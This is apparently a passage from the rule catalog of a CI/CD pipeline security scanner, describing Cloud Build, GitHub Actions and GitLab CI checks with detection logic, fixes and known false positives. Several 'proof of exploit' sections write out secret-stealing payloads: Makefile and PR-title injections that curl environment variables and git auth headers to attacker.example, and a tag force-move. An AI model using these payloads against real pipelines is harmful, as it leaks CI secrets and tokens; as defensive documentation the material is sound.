How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.
Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.
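A sketch of the dedicated-SA shape (names illustrative). Note that when the build runs as a user-managed service account, Cloud Build also requires an explicit logging destination:

```yaml
serviceAccount: projects/my-project/serviceAccounts/ci-backend@my-project.iam.gserviceaccount.com
options:
  logging: CLOUD_LOGGING_ONLY   # required alongside a user-managed serviceAccount
```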
Known false positives.
- Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.
Source: GCB-020 in the Cloud Build provider.
GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and integration with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.
Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.
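The opt-in is a single field (project, region, and pool name are placeholders):

```yaml
options:
  pool:
    name: projects/my-project/locations/us-central1/workerPools/ci-private-pool
```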
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief .pipelinecheckignore rationale rather than disabling at the catalog level.
Source: GCB-021 in the Cloud Build provider.
GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.
Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That papers over typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and combined with dynamicSubstitutions: true (GCB-004) it widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.
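A sketch of the safe shape, using a declared default instead of the silent empty-string fallback:

```yaml
options:
  substitutionOption: MUST_MATCH   # or omit the field entirely; this is the default
substitutions:
  _REGION: us-central1             # optional values get explicit defaults here
```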
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief .pipelinecheckignore rationale and an expires: date so the waiver doesn't outlive the migration.
Source: GCB-022 in the Cloud Build provider.
GCB-023: Step references a user substitution not declared in substitutions: MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline.
How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.
Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.
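A sketch (variable names and defaults are illustrative):

```yaml
substitutions:
  _SERVICE: backend      # sensible default
  _REGION: ''            # trigger always supplies this; declared anyway
steps:
  - name: gcr.io/cloud-builders/gcloud
    args: ['run', 'deploy', '$_SERVICE', '--region', '$_REGION']
```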
Source: GCB-023 in the Cloud Build provider.
GCB-024: Build pushes Docker images but top-level images: is empty LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. The rule fires when the build has at least one such step but the top-level images: field is missing or empty. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected; those are different builder images entirely.
Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.
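A minimal sketch (image name illustrative). When the image is listed in images:, Cloud Build performs the push itself and records the result, so the step only needs to build:

```yaml
steps:
  - name: gcr.io/cloud-builders/docker
    args: ['build', '-t', 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA', '.']
images:
  - 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA'
```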
Known false positives.
- Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in images:) trip this rule on the cache push. Suppress with --ignore-file when this matches.
Source: GCB-024 in the Cloud Build provider.
GCB-025: Build has no tags for audit / discoverability LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated. Cloud Build expands them at submission time.
Recommendation. Add a top-level tags: array to every cloudbuild.yaml: at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries, so post-incident triage ("which build emitted this?") becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds are discoverable only by build ID, and the ID is a UUID with no signal.
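A sketch (tag values illustrative):

```yaml
tags:
  - prod
  - backend
  - '$BRANCH_NAME'   # substitution-bearing tags count as populated
```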
Known false positives.
- Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with --ignore-file if that matches.
Source: GCB-025 in the Cloud Build provider.
GCB-026: Step waitFor: references an unknown step id MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists: typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.
Recommendation. Verify every ID listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build; Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.
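A sketch of a correct dependency graph (step names and args illustrative):

```yaml
steps:
  - id: fetch-config
    name: gcr.io/cloud-builders/gsutil
    args: ['cp', 'gs://my-bucket/config.json', '.']
  - id: build
    name: gcr.io/cloud-builders/docker
    waitFor: ['fetch-config']   # must match the sibling id: exactly
    args: ['build', '-t', 'gcr.io/$PROJECT_ID/myapp', '.']
```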
Source: GCB-026 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, so a third-party action compromise propagates into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind @v1 / @v45 shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA.
- reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.
Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a pull_request_target workflow with the PR head checked out runs in the base repo's privileged context.
- Trail of Bits, Codecov-style supply chain via pwn requests (2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.
Proof of exploit.
Vulnerable: pull_request_target + checkout PR head =
attacker code runs with secrets + write-scope token.
name: build-pr
on:
pull_request_target:
branches: [main]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Attack: any external contributor opens a fork PR with a
tampered Makefile:
test:
  curl -X POST https://attacker.example/exfil \
    -d "$(env)" \
    -d "$(git config --get-all http.https://github.com/.extraheader)"
CI runs the malicious target with the base repo's secrets
(every ${{ secrets.* }} the workflow has access to) and a
write-scope GITHUB_TOKEN. The PR doesn't even need to be
merged or reviewed — the privileged execution happens at
PR-open time.
Safe: split the workflow. The labeler runs with secrets
but never checks out PR head; the builder runs in
pull_request context with no secrets:
name: triage  # privileged half
on: { pull_request_target: { types: [opened, synchronize] } }
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - run: gh pr edit ${{ github.event.number }} --add-label triage
        env:
          GH_TOKEN: ${{ github.token }}
name: build # unprivileged half
on: { pull_request: {} }
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@
Source: GHA-002 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating github.event.issue.title / pull_request.title directly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI.
- Trail of Bits pwn-request research (2021): demonstrated the same primitive against pull_request_target workflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route through env:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage
on:
  pull_request_target:
    types: [opened, edited]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New PR: ${{ github.event.pull_request.title }}"
Attack: open a PR with the title:
foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: |
echo "New PR: $PR_TITLE"
Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
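A sketch of the scoping pattern (job and script names illustrative):

```yaml
permissions:
  contents: read          # workflow-wide floor
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: make test    # inherits the read-only token
  release:
    permissions:
      contents: write     # only the job that pushes a tag gets write
    runs-on: ubuntu-latest
    steps:
      - run: ./scripts/release.sh
```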
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
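A sketch of the OIDC shape (the role ARN and region are placeholders; per GHA-001 the action ref should be SHA-pinned in real use, shortened here for readability):

```yaml
permissions:
  id-token: write    # required for the OIDC token exchange
  contents: read
steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::123456789012:role/ci-deploy
      aws-region: us-east-1
```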
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set AWS_ENDPOINT_URL to a localhost address and use the sentinel test / test access keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognizes cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step, e.g. sigstore/cosign-installer followed by cosign sign, or slsa-framework/slsa-github-generator for keyless SLSA provenance. Publish the signature alongside the artifact and verify it at consumption time.
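A sketch of a keyless signing step (the image reference and step id are illustrative; keyless cosign needs id-token: write on the job):

```yaml
permissions:
  id-token: write
steps:
  - uses: sigstore/cosign-installer@v3
  - run: cosign sign --yes "ghcr.io/${{ github.repository }}@${{ steps.push.outputs.digest }}"
```

steps.push.outputs.digest assumes an earlier docker/build-push-action step with id: push.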
Seen in the wild.
- SolarWinds Orion compromise (December 2020): SUNBURST trojanized builds shipped to ~18,000 customers because no post-build signature could be checked against a trusted signing identity. Cryptographic signing on every release would have given downstream consumers a verifiable link to the upstream key; its absence would itself have signaled compromise.
- PyTorch nightly compromise (December 2022): the torchtriton dependency was hijacked via PyPI dependency-confusion. Sigstore-style attestation tied to the official publisher would have made the impostor build fail verification rather than silently install.
Source: GHA-006 in the GitHub Actions provider.
GHA-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step, anchore/sbom-action, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the release so consumers can ingest it into their vuln-management pipeline.
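A sketch using the Anchore action (input names per its documented surface; the upload step is one way to publish the document):

```yaml
steps:
  - uses: anchore/sbom-action@v0
    with:
      format: cyclonedx-json
      output-file: sbom.cdx.json
  - uses: actions/upload-artifact@v4
    with:
      name: sbom
      path: sbom.cdx.json
```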
Source: GHA-007 in the GitHub Actions provider.
GHA-040: Action reference matches a known-compromised SHA or tag CRITICAL
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Walks every workflow's steps[].uses: and jobs.<id>.uses: references against the curated compromised-action registry in pipeline_check.core.checks.github._compromised_actions. Match is case-insensitive on owner / repo and exact on the ref value (commit SHA or tag name). Registry is deliberately small and append-only — refresh by PR with the citing advisory in the commit message; no fetch-from-network registry to avoid taking on a telemetry surface.
Recommendation. Rotate every secret that may have been reachable to a workflow run that hit the compromised reference, then update the uses: reference to a known-clean SHA published by the upstream maintainer post-incident (usually announced in the advisory body). Audit CI logs for the affected window for any sign that the malicious payload ran against this repo.
Known false positives.
- The registry covers only public, advisory-confirmed compromises. Pre-disclosure compromises and yet-unpublished maintainer-account takeovers do not land until the citing CVE / GHSA exists. Pair with GHA-001 (SHA pinning) and GHA-025 (tag-rewrite detection) for the prevention angle.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): the canonical case the registry was built for. Roughly 23,000 tag-pinned repos shipped CI secrets to an exfiltration endpoint over a ~24-hour window before GitHub blocked the malicious commits.
- reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week as tj-actions; smaller blast radius but identical mechanism. Tag-pinned consumers were affected; SHA-pinned consumers who happened to match the malicious commit were also affected.
Proof of exploit.
Vulnerable: pinned to a SHA the attacker landed under @v45.
Same applies to tag pins that resolved to the malicious
commit during the compromise window:
- uses: tj-actions/changed-files@v45 # WAS pointing at the bad commit
Attack: the action body exfiltrated CI secrets to a
Memdump-style endpoint:
curl -X POST https://attacker.example/exfil \
-d "$(cat /proc/self/environ)"
Every workflow run that hit one of those refs over the
~24-hour exposure window leaked the entire env block,
including ${{ secrets.* }} and GITHUB_TOKEN.
Safe: pin to the post-incident clean SHA the maintainer
published in the advisory:
- uses: tj-actions/changed-files@a284dc1 # v45.0.0 (clean)
Source: GHA-040 in the GitHub Actions provider.
GHA-041: Action upstream repo has a single contributor MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads the contributor count from ctx.action_metadata[owner/repo].contributor_count (populated by the --resolve-remote path; the GitHub REST /contributors endpoint, capped at two entries — the rule only cares about == 1). When the fetch failed or the flag is off, the rule passes silently. Forks and archived repos that ALSO have a single contributor fire the rule; the fork / archived state is part of the same supply-chain risk story.
Recommendation. Audit the action repo's contributor list. If the repo genuinely has one maintainer, pin to a vendored fork under your org's control (so a future compromise on the upstream doesn't reach your build runtime) or move to a first-party action covering the same surface. The single-maintainer pattern is what made the tj-actions / reviewdog one-day compromises so wide in blast radius.
Known false positives.
- Some well-maintained single-author actions (high-quality personal-account repos that the maintainer simply hasn't open-sourced governance for) are not actually compromised. Suppress via ignore-file when a security review has confirmed the maintainer's identity and 2FA posture.
Seen in the wild.
- tj-actions / reviewdog March 2025 compromises (CVE-2025-30066 / CVE-2025-30154): both upstream repos had a single primary contributor at the time of compromise. The single-maintainer pattern was central to the blast radius (no second pair of eyes on the malicious commit, no auto-rollback when the tag move landed).
Source: GHA-041 in the GitHub Actions provider.
GHA-042: Action upstream repo is newly created MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads created_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path). Fires when the repo's age in days is below MIN_AGE_DAYS (90). Without the opt-in flag the rule passes silently with a nudge.
Recommendation. Verify the action repo is the real upstream and not a typosquat. Compare the spelling and owner against the intended action (actions/checkout vs actoins/checkout); check the repo description, stars, and prior releases. If the action is genuinely new but trusted, suppress via ignore-file with a dated note; the suppression decays naturally as the repo ages past the 90-day threshold.
Known false positives.
- Newly-released first-party actions from a trusted org (say, a freshly-launched
actions/foorolled out by GitHub itself) fire while they're still young. Suppress via ignore-file with a dated note; the entry expires naturally once the repo crosses the age threshold.
Seen in the wild.
- GitGuardian / StepSecurity typosquat reports (2023-2024) document several action-naming impersonations that appeared as newly-registered repos and reached production CI before the legitimate owner was notified.
Source: GHA-042 in the GitHub Actions provider.
GHA-043: Low-star action runs with sensitive permissions HIGH
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads stargazers_count from ctx.action_metadata[owner/repo] and the effective permissions: block (job-level wins; falls back to workflow-top-level; falls back to the caller's inherited block for resolved reusable workflows). Fires when stars < MAX_STARS (25) AND any of 'contents', 'packages', 'id-token', 'actions', 'deployments' is set to write on the calling job. permissions: write-all is treated as all scopes set to write.
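The two-sided condition can be sketched as one predicate over the resolved permissions block. Names are illustrative; the write-all expansion mirrors the rule text:

```python
MAX_STARS = 25
SENSITIVE = ("contents", "packages", "id-token", "actions", "deployments")

def low_star_sensitive_write(stars, permissions):
    """Fire only on the combination: stars below the threshold AND a write
    grant on a sensitive scope. `permissions` is the effective block after
    job-level / workflow-level resolution; the literal string "write-all"
    models `permissions: write-all` (every scope set to write)."""
    if permissions == "write-all":
        permissions = {scope: "write" for scope in SENSITIVE}
    sensitive_write = any(permissions.get(s) == "write" for s in SENSITIVE)
    return stars < MAX_STARS and sensitive_write
```

Either side alone passing is by design: a popular action with write scopes, or an obscure action with read-only scopes, never fires.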
Recommendation. Either narrow the calling job's permissions: to the minimum the action actually needs (drop contents: write / id-token: write / packages: write / actions: write / deployments: write unless the action's documented surface requires them), or replace the action with a community-reviewed alternative. The rule fires on the COMBINATION of low community review and elevated permissions; either side alone is fine.
Known false positives.
- Internal first-party actions hosted in a private org repo legitimately have low public star counts; their threat model is different and the rule does not distinguish internal from third-party. Suppress via ignore-file when the action is in-org and trusted.
Seen in the wild.
- GitGuardian 2023 supply-chain audit: a handful of low-popularity actions with contents: write were weaponized via single-PR maintainer-impersonation compromises; the elevated permission was the privilege amplifier that let the attacker push code back to the victim's default branch on the same workflow run.
Source: GHA-043 in the GitHub Actions provider.
GHA-047: Action ref resolves to a recently committed tag or SHA MEDIUM
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads ref_committed_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path via GET /repos/{owner}/{repo}/commits/{ref}). Fires when the referenced ref's commit date is younger than MIN_REF_AGE_DAYS (7). Trusted publishers (actions, aws-actions, azure, ...) are skipped by default to avoid firing on legitimate retags of floating majors; pin to a SHA to opt those back in. Without --resolve-remote the rule passes silently with a discovery nudge.
Recommendation. Wait until the referenced tag or commit has had time to be reviewed by the upstream community before pulling it into CI. The default cooldown is seven days. Either bump the pinned ref to an older release, or wait 7 days and re-run. If the action is internal / first-party and the freshness gate is unwanted, pin to a 40-char commit SHA — SHA pins don't move under a retag and are the preferred long-term mitigation.
Known false positives.
- A legitimate first-party action that's outside the default trusted-publisher allowlist (a small vendor org that publishes a real action; you'd like it included) will fire after every release for the cooldown window. Either pin to a SHA (preferred) or suppress via ignore-file with a dated note; the suppression decays once the ref ages past the threshold.
Seen in the wild.
- Multiple action-tag compromises (ua-parser-js npm 2021, tj-actions/changed-files 2024) followed the same shape: a tag was re-pointed at a malicious commit and consumers pulling on the next CI run executed the payload. Cooldown gating turns the community-detection window into a defense.
Source: GHA-047 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
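The pinned/unpinned distinction can be approximated with two patterns. A hedged sketch; these regexes are illustrative simplifications, not the rule's exact matching:

```python
import re

DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")
FULL_TAG_RE = re.compile(r":\d+\.\d+[\w.\-]*$")  # e.g. :3.12.1-slim

def image_pinned(image: str) -> bool:
    """True when an image: reference ends in a digest or a full version tag.
    :latest, bare major tags (:3), and tagless references all fail."""
    return bool(DIGEST_RE.search(image) or FULL_TAG_RE.search(image))
```

Digest pins are the strong form: a tag, even a full one, can still be re-pointed by the registry owner, while a digest names the bytes.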
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
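The key-shape / value-shape split can be sketched as follows. The patterns are illustrative placeholders, not the tool's exact regexes:

```python
import re

CRED_KEY_RE = re.compile(r"TOKEN|SECRET|PASSWORD|KEY", re.IGNORECASE)
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")  # value pattern, any key name

def literal_secret(key: str, value: str) -> bool:
    """Fire on credential-shaped keys whose value is a literal string, and on
    AWS-access-key-shaped values regardless of key name. $VAR references
    (pointers to protected/masked CI/CD variables) pass."""
    if value.startswith("$"):
        return False  # reference, not a literal
    if AWS_KEY_RE.search(value):
        return True
    return bool(CRED_KEY_RE.search(key)) and bool(value)
```

The AWS branch exists because access-key IDs have a fixed, recognizable shape, so they're detectable even under an innocuous key name like REGION.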
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified, 3.1.5 Ensure only trusted package managers and repositories are used.
